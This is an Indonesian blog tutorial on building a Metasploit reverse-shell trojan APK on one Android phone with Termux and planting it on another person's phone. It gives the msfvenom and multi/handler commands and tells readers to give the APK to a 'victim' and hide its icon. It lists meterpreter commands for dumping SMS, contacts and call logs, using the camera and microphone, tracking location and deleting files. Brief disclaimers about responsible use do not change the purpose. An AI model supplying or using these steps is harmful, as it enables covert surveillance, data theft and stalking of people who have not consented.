Cara Menyadap Smartphone Android Menggunakan Smartphone Android

tutorial

cara exploit smartphone android orang lain menggunakan smartphone android milik kita dan metasploit, tapi sebelum memulai tutorialnya saya tidak bertanggung jawab jika seandainya nanti kalian mencobanya dan mendapatkan suatu masalah, karena tujuan saya disini hanya berbagi tutorial saja dan mohon di minta untuk di baca dari atas sampai akhir.

Apa Metasploit?
metasploit adalah sebuah tool hacking yang di bilang cukup berbahaya ketika masuk ke dalam sistem atau perangkat milik kita, seorang penyerang yang menyerang suatu sistem dengan metasploit akan sangat berakibat fatal pada perangkat yang kita miliki.

Bahkan mereka mampu memanipulasi apa pun yang ada pada sistem perangkat kita seperti menghapus, merubah, mencuri file, menangkap kamera depan atau belakang, membaca semua aktivitas penuh pada perangkat kita dan masih banyak lagi.

Metasploit merupakan sebuah tool untuk membuat trojan yang bisa berfungsi seperti yang sudah saya jelaskan di atas yaitu memanipulasi sistem pada perangkat yang kita miliki dan serangan ini sering juga disebut sebagai 0-Day Exploit.

Exploit memanfaatkan celah keamanan pada suatu sistem yang keamanan diabaikan oleh para pemilik sistem tersebut, maka dari itu jika sistem kalian mendapatkan serangan exploit maka jangan salahkan para penyerang, namun seharusnya perbaiki sistem kalian dan cari penyebab dari serangan tersebut.

Biasanya terinfeksinya suatu sistem perangkat dengan metasploit ini karena suatu hal yaitu menginstall suatu aplikasi yang terlihat asing atau juga file, namun dalam postingan ini saya akan berbagi cara-caranya menginfeksi sistem smartphone android dengan aplikasi android yang terbuat dari metasploit yang tak lain adalah trojan.

Di atas merupakan penjelasan penting yang harus di baca dan dipahami sebelum kalian memulai menginstall metasploit pada smartphone android kalian, jika kalian sudah memahaminya maka selanjutnya kita akan langsung memulai tutorialnya.

1. Syarat untuk bisa menggunakan metasploit pada smartphone android, kalian harus menginstall termux yang akan digunakan sebagai terminal untuk menjalankan dan juga memanipulasi android dengan metasploit

2. Install metasploit pada smartphone android kalian
3. Saya anggap kalian sudah berhasil melakukan installasi metasploit pada smartphone android kalian, dan sekarang buatlah trojan yang bereksistensi .apk pada metasploit di termux dengan mengetikan perintah msfvenom -p android/meterpreter/reverse_tcp LHOST=IP-ANDA R > android.apk, ganti IP-ANDA dengan alamat ip smartphone android anda dan saya beri nama android.apk namun nama bisa sesuai keinginan kalian.

4. Jika kalian sudah berhasil membuat trojan maka selanjutnya adalah menjalankan metasploit dengan mengetikan perintah di termux msfconsole dan enter.

5. Jika sudah berjalan maka ketikan lagi perintah di termux use exploit/multi/handler dan enter.

6. Kemudian set payload dengan mengetikan perintah lagi di termux set payload android/meterpreter/reverse_tcp dan enter.

7. Set juga ip yang sudah anda tulis tadi dengan mengetik lagi perintah di termux set lhost IP-ANDA, ganti IP-ANDA menjadi alamat ip smartphone android anda.

8.Dan yang terakhir adalah mulai melancarkan serangan metasploit kalian dengan mengetik di termux exploit, maka termux akan menunggu korban yang menginstall sebuah aplikasi android yang sudah kalian buat tadi.

Berikanlah aplikasi android yang sudah dibuat tadi kepada calon korban dan biarkan mereka menginstallnya, jangan lupa juga untuk mengaktifkan data internet.

9. Ketika korban telah berhasil menginstall dan membuka trojan yang kita buat maka termux kalian langsung mendapatkan akses ke dalam sistem smartphone android tersebut.

10. Tunggu termux mengeluarkan tanda $meterpreter> dan jika sudah dalam meterpreter maka cepatlah mengetik perintah di termux hide_app_icon yang berfungsi menyembunyikan ikon aplikasi dalam smartphone korban, dan untuk perintah-perintah lainya bisa coba ketikan perintah-perintah di bawah ini pada termux kalian:

– help -> Perintah untuk melihat perintah-perintah yang tersedia pada metasploit.
– sysinfo -> Menampilkan spesifikasi sistem operasi smartphone android korban.
– rmdir -> Menghapus folder atau direktori pada smartphone android korban.
– rm -> Menghapus file pada smartphone android korban.
– dump_sms -> Membaca sms pada smartphone android korban.
– dump_calllog -> Membaca log panggilan pada smartphone android korban.
– dump_contacts -> Membaca kontak pada smartphone android korban.
– webcam_snap -> Membuka kamera depan pada smartphone android korban.
– webcam_stream -> Streaming video pada smartphone android korban.
– geolocation -> Menampilkan lokasi korban.
– send_sms -> Mengirim sms ke smartphone android korban.
– check_root -> Cek root smartphone android korban.
– hide_app_icon -> Sembunyikan ikon aplikasi trojan pada smartphone android korban.
– record_mic -> Merekam audio pada smartphone android korban.
– ifconfig -> Melihat alamat ip smartphone android korban.
– screenshot -> Melakukan tangkapan layar pada smartphone android korban.

Masih banyak perintah lainya yang bisa kalian gunakan untuk memanipulasi sistem pada smartphone android korban, kalian bisa mempelajarinya dengan mengetik help maka akan muncul perintah-perintah yang bisa kalian jalankan.

Gunakanlah secara baik-baik dan jangan menggunakanya dengan sembarangan karena itu merupakan masalah yang besar, gunakanlah ketika anda ingin mencari para penjahat, bukan malah ingin menjahati seseorang.

Demikian postingan kali ini, sekali lagi saya tuliskan untuk menggunakanya secara bijak dan jangan beranggapan jika sudah bisa melakukan ini berarti sudah hebat, itu sangat salah dan kalian hanya terbawa nafsu dalam diri kalian sendiri.

1 thought on “Cara Menyadap Smartphone Android Menggunakan Smartphone Android

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.